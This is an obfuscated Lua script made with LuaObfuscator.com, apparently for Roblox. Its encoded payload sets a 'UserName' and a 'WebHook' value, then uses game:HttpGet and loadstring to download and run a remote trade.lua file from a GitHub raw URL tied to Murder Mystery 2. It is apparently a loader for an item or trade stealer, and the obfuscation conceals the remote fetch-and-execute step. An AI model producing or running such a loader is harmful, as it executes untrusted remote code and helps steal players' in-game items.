--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v88=0;local v89;while true do if (v88==0) then v89=v2(v0(v30,16));if v19 then local v119=0;local v120;while true do if (v119==1) then return v120;end if (v119==0) then v120=v5(v89,v19);v19=nil;v119=1;end end else return v89;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v90=0 -0 ;local v91;while true do if (v90==((0 + 0) -0)) then v91=(v31/(2^(v32-((1271 -(226 + 1044)) -0))))%((4 -(8 -6))^(((v33-(620 -(555 + 64))) -(v32-(932 -(857 + 74)))) + (569 -(367 + 201)))) ;return v91-(v91%(928 -(214 + 713))) ;end end else local v92=0;local v93;while true do if (v92==((117 -(32 + 85)) + 0)) then v93=((1 -0) + 1)^(v32-(878 -(282 + 595))) ;return (((v31%(v93 + v93))>=v93) and 1) or (1637 -(1523 + 112 + 2)) ;end end end end local function v21() local v34=0 + 0 ;local v35;while true do if (v34==((1307 -(87 + 263)) -(892 + 65))) then v35=v1(v16,v18,v18);v18=v18 + (2 -1) ;v34=1 -0 ;end if (v34==((181 -(67 + 113)) -0)) then return v35;end end end local function v22() local v36,v37=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (4 -2) ;return (v37 * (189 + 67)) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (11 -8) );v18=v18 + 4 ;return (v41 * (16778168 -(802 + 110 + 40))) + (v40 * (176444 -110908)) + (v39 * (464 -208)) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=998 -(915 + 82) ;local v45=(v20(v43,(1 + 1) -(1081 -(1020 + 60)) ,12 + 8 ) * (((6 -4) -0)^(462 -(44 + 386)))) + v42 ;local v46=v20(v43,1208 -(1069 + 118) ,70 -39 );local v47=((v20(v43,11 + 21 )==(1 + 0)) and  -(1 -0)) or (1 + 0) ;if (v46==(0 -0)) then if (v45==(0 + 0)) then return v47 * (791 -(368 + 423)) ;else v46=(1750 -(760 + 987)) -2 ;v44=18 -((1923 -(1789 + 124)) + (774 -(745 + 21))) ;end elseif (v46==(7874 -(2005 + 3822))) then return ((v45==((1215 -773) -(416 + 26))) and (v47 * (((1424 -(630 + 793)) + 0)/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-((6465 -4557) -(261 + (2954 -2330))) ) * (v44 + (v45/((3 -1)^52))) ;end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==(0 + 0)) then return "";end end v49=v3(v16,v18,(v18 + v48) -(1056 -(87 + 968)) );v18=v18 + v48 ;local v50={};for v66=1 + 0 , #v49 do v50[v66]=v2(v1(v3(v49,v66,v66)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v94,v95,v96,v97,v98,v99,v100,v101,v102) local v103=(function() return 0;end)();local v94=(function() return;end)();local v95=(function() return;end)();while true do local v112=(function() return 736 -(223 + 513) ;end)();while true do if (v112==0) then if (v103==1) then while true do if (v94==(0 + 0)) then v95=(function() return v96();end)();if (v97(v95, #",", #":")~=(0 -0)) then else local v156=(function() return 0 -0 ;end)();local v157=(function() return;end)();local v158=(function() return;end)();local v159=(function() return;end)();local v160=(function() return;end)();while true do if (v156==(0 + 0)) then local v199=(function() return 0;end)();while true do if (v199~=(1637 -(1373 + 263))) then else v156=(function() return 1;end)();break;end if (v199~=(1000 -(451 + 549))) then else v157=(function() return 0;end)();v158=(function() return nil;end)();v199=(function() return 1 + 0 ;end)();end end end if (v156~=2) then else while true do if (v157~=2) then else local v203=(function() return 0;end)();while true do if (0==v203) then if (v97(v159, #"}", #">")== #"~") then v160[2 -0 ]=(function() return v98[v160[2 -0 ]];end)();end if (v97(v159,1386 -(746 + 638) ,2)~= #" ") then else v160[ #"nil"]=(function() return v98[v160[ #"91("]];end)();end v203=(function() return 1;end)();end if (v203==(1 + 0)) then v157=(function() return  #"asd";end)();break;end end end if ( #"19("~=v157) then else if (v97(v159, #"asd", #"asd")~= #"{") then else v160[ #"http"]=(function() return v98[v160[ #"0313"]];end)();end v99[v100]=(function() return v160;end)();break;end if (v157== #"|") then local v205=(function() return 0 -0 ;end)();while true do if (v205==1) then v157=(function() return 2;end)();break;end if (v205==0) then v160=(function() return {v101(),v101(),nil,nil};end)();if (v158==0) then local v210=(function() return 0;end)();local v211=(function() return;end)();while true do if (v210==(341 -(218 + 123))) then v211=(function() return 1581 -(1535 + 46) ;end)();while true do if (v211~=(0 + 0)) then else v160[ #"91("]=(function() return v101();end)();v160[ #"asd1"]=(function() return v101();end)();break;end end break;end end elseif (v158== #"{") then v160[ #"nil"]=(function() return v102();end)();elseif (v158==(1 + 1)) then v160[ #"-19"]=(function() return v102() -(2^16) ;end)();elseif (v158~= #"xnx") then else local v216=(function() return 0;end)();while true do if (v216==0) then v160[ #"91("]=(function() return v102() -(2^(576 -(306 + 254))) ;end)();v160[ #"asd1"]=(function() return v101();end)();break;end end end v205=(function() return 1 + 0 ;end)();end end end if (v157==0) then local v206=(function() return 0 -0 ;end)();while true do if ((1468 -(899 + 568))~=v206) then else v157=(function() return  #"}";end)();break;end if (v206==0) then v158=(function() return v97(v95,2, #"asd");end)();v159=(function() return v97(v95, #"asd1",4 + 2 );end)();v206=(function() return 2 -1 ;end)();end end end end break;end if (v156~=(604 -(268 + 335))) then else local v200=(function() return 0;end)();while true do if ((290 -(60 + 230))==v200) then v159=(function() return nil;end)();v160=(function() return nil;end)();v200=(function() return 573 -(426 + 146) ;end)();end if (v200~=(1 + 0)) then else v156=(function() return 1458 -(282 + 1174) ;end)();break;end end end end end break;end end return v94,v95,v96,v97,v98,v99,v100,v101,v102;end if (v103==(811 -(569 + 242))) then local v121=(function() return 0;end)();local v122=(function() return;end)();while true do if (v121~=0) then else v122=(function() return 0 -0 ;end)();while true do if (v122~=(0 + 0)) then else v94=(function() return 1024 -(706 + 318) ;end)();v95=(function() return nil;end)();v122=(function() return 1252 -(721 + 530) ;end)();end if (v122==1) then v103=(function() return 1272 -(945 + 326) ;end)();break;end end break;end end end break;end end end end;end)();local v52=(function() return function(v104,v105,v106) local v107=(function() return 0 -0 ;end)();local v108=(function() return;end)();while true do if (v107==(0 + 0)) then v108=(function() return 700 -(271 + 429) ;end)();while true do if ((0 + 0)~=v108) then else local v123=(function() return 0;end)();local v124=(function() return;end)();while true do if ((1500 -(1408 + 92))~=v123) then else v124=(function() return 0;end)();while true do if (v124~=(1086 -(461 + 625))) then else v104[v105-#"." ]=(function() return v106();end)();return v104,v105,v106;end end break;end end end end break;end end end;end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {v53,v54,nil,v55};end)();local v57=(function() return v23();end)();local v58=(function() return {};end)();for v68= #"/",v57 do local v69=(function() return 1288 -(993 + 295) ;end)();local v70=(function() return;end)();local v71=(function() return;end)();while true do if (v69==0) then local v113=(function() return 0 + 0 ;end)();while true do if ((1172 -(418 + 753))==v113) then v69=(function() return 1 + 0 ;end)();break;end if (v113==(0 + 0)) then v70=(function() return v21();end)();v71=(function() return nil;end)();v113=(function() return 1 + 0 ;end)();end end end if (v69==1) then if (v70== #">") then v71=(function() return v21()~=0 ;end)();elseif (v70==(1 + 1)) then v71=(function() return v24();end)();elseif (v70== #"nil") then v71=(function() return v25();end)();end v58[v68]=(function() return v71;end)();break;end end end v56[ #"gha"]=(function() return v21();end)();for v72= #"!",v23() do FlatIdent_12703,Descriptor,v21,v20,v58,v53,v72,v22,v23=(function() return v51(FlatIdent_12703,Descriptor,v21,v20,v58,v53,v72,v22,v23);end)();end for v73= #"/",v23() do v54,v73,v28=(function() return v52(v54,v73,v28);end)();end return v56;end local function v29(v60,v61,v62) local v63=v60[1];local v64=v60[2];local v65=v60[532 -(406 + (339 -(42 + 174))) ];return function(...) local v74=v63;local v75=v64;local v76=v65;local v77=v27;local v78=1770 -(1314 + 435 + 20) ;local v79= -1;local v80={};local v81={...};local v82=v12("#",...) -1 ;local v83={};local v84={};for v109=1322 -(1249 + 73) ,v82 do if (v109>=v76) then v80[v109-v76 ]=v81[v109 + 1 + 0 + 0 ];else v84[v109]=v81[v109 + (1146 -(466 + (2183 -(363 + 1141)))) ];end end local v85=(v82-v76) + ((1582 -(1183 + 397)) -1) ;local v86;local v87;while true do v86=v74[v78];v87=v86[2 -(2 -1) ];if (v87<=(1905 -(106 + 1794))) then if (v87<=(1 + 0 + 1 + 0)) then if (v87<=(0 + 0)) then v78=v86[8 -5 ];elseif ((v87==(2 -1)) or (443>=4015)) then v84[v86[116 -(4 + 110) ]]=v62[v86[587 -(57 + 527) ]];else local v133=v86[(3404 -(1913 + 62)) -(41 + 1386) ];v84[v133]=v84[v133]();end elseif ((3382>166) and (v87<=(106 -(17 + 55 + 31)))) then local v126=v86[2 + 0 ];local v127=v84[v86[6 -3 ]];v84[v126 + (2 -1) ]=v127;v84[v126]=v127[v86[170 -((322 -200) + 44) ]];elseif (v87>(6 -2)) then for v152=v86[6 -4 ],v86[3] do v84[v152]=nil;end else local v135=1933 -(565 + 1368) ;local v136;while true do if ((v135==(0 + 0)) or (280==3059)) then v136=v86[2];v84[v136]=v84[v136](v13(v84,v136 + (3 -2) + 0 ,v79));break;end end end elseif ((1881>1293) and (v87<=(16 -8))) then if ((2357==2357) and (v87<=((1732 -(1477 + 184)) -(30 + 35)))) then if (v84[v86[(2 -0) + 0 ]]==v86[1261 -(1043 + 214) ]) then v78=v78 + 1 + 0 ;else v78=v86[11 -(864 -(564 + 292)) ];end elseif (v87==((2102 -883) -(323 + 889))) then local v138=v86[5 -3 ];local v139,v140=v77(v84[v138](v13(v84,v138 + ((1751 -1170) -(361 + 219)) ,v86[3])));v79=(v140 + v138) -(321 -(53 + (571 -(244 + 60)))) ;local v141=0 + 0 ;for v154=v138,v79 do local v155=413 -(15 + 398) ;while true do if (v155==(982 -(18 + 964))) then v141=v141 + 1 ;v84[v154]=v139[v141];break;end end end else v62[v86[11 -8 ]]=v84[v86[2 + 0 ]];end elseif (v87<=(5 + 1 + 3)) then do return;end elseif (v87==((1336 -(41 + 435)) -((1021 -(938 + 63)) + 830))) then local v144=0 + 0 ;local v145;local v146;local v147;local v148;local v149;while true do if (v144==((100 + 29) -(116 + 10))) then v86=v74[v78];v149=v86[2];v148=v84[v86[3]];v84[v149 + 1 + 0 ]=v148;v84[v149]=v148[v86[(1867 -(936 + 189)) -(542 + 196) ]];v78=v78 + (1 -0) ;v144=4;end if ((123==123) and (v144==4)) then v86=v74[v78];v84[v86[1 + 0 + 1 ]]=v86[2 + 1 ];v78=v78 + (1614 -(1565 + 48)) + 0 ;v86=v74[v78];v149=v86[2 + 0 ];v146,v147=v77(v84[v149](v13(v84,v149 + ((1140 -(782 + 356)) -1) ,v86[7 -4 ])));v144=1556 -(1126 + 425) ;end if (v144==(410 -(118 + (554 -(176 + 91))))) then v79=(v147 + v149) -(3 -2) ;v145=1121 -(118 + 1003) ;for v197=v149,v79 do local v198=0 -0 ;while true do if (v198==(377 -(142 + 235))) then v145=v145 + (4 -3) ;v84[v197]=v146[v145];break;end end end v78=v78 + (2 -1) + 0 ;v86=v74[v78];v149=v86[979 -(553 + 424) ];v144=6;end if ((v144==(10 -4)) or (1056>=3392)) then v84[v149]=v84[v149](v13(v84,v149 + 1 + 0 ,v79));v78=v78 + 1 + 0 ;v86=v74[v78];v149=v86[2 + (0 -0) ];v84[v149]=v84[v149]();v78=v78 + 1 + 0 ;v144=4 + 3 ;end if ((((1096 -(975 + 117)) -2)==v144) or (1081<1075)) then v84[v149 + (2 -1) ]=v148;v84[v149]=v148[v86[8 -(1879 -(157 + 1718)) ]];v78=v78 + 1 + 0 ;v86=v74[v78];v84[v86[2]]=v62[v86[3]];v78=v78 + (4 -3) ;v144=(614 + 142) -(239 + (1824 -1310)) ;end if ((v144==(1 + 0)) or (1049>=4432)) then v86=v74[v78];v84[v86[1331 -(797 + 532) ]]=v62[v86[3 + 0 ]];v78=v78 + (3 -2) ;v86=v74[v78];v149=v86[1 + 1 ];v148=v84[v86[6 -3 ]];v144=1204 -(373 + 829) ;end if (v144==7) then v86=v74[v78];v62[v86[1021 -(697 + 321) ]]=v84[v86[733 -((1296 -820) + 255) ]];break;end if (v144==(1130 -(369 + 761))) then v145=nil;v146,v147=nil;v148=nil;v149=nil;v62[v86[2 + (1 -0) ]]=v84[v86[(4 -2) -0 ]];v78=v78 + (1 -0) ;v144=239 -(64 + 174) ;end end else v84[v86[1 + 1 ]]=v86[3 -0 ];end v78=v78 + (337 -(144 + 192)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!093Q00028Q0003083Q00557365724E616D6503083Q00472Q4F465F55503103073Q00576562482Q6F6B03053Q00682Q747073030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574033F3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F4861726447616D6553732F2Q4D322F6D61696E2F74726164652E6C756100173Q00120B3Q00014Q0005000100013Q0026063Q00020001000100044Q0002000100120B000100013Q002606000100050001000100044Q0005000100120B000200033Q00120A000200023Q00122Q000200053Q00202Q00020002000600122Q000400073Q00202Q00040004000800122Q000600096Q000400066Q00023Q00024Q00020001000200122Q000200043Q00044Q0016000100044Q0005000100044Q0016000100044Q000200012Q00093Q00017Q00",v9(),...);
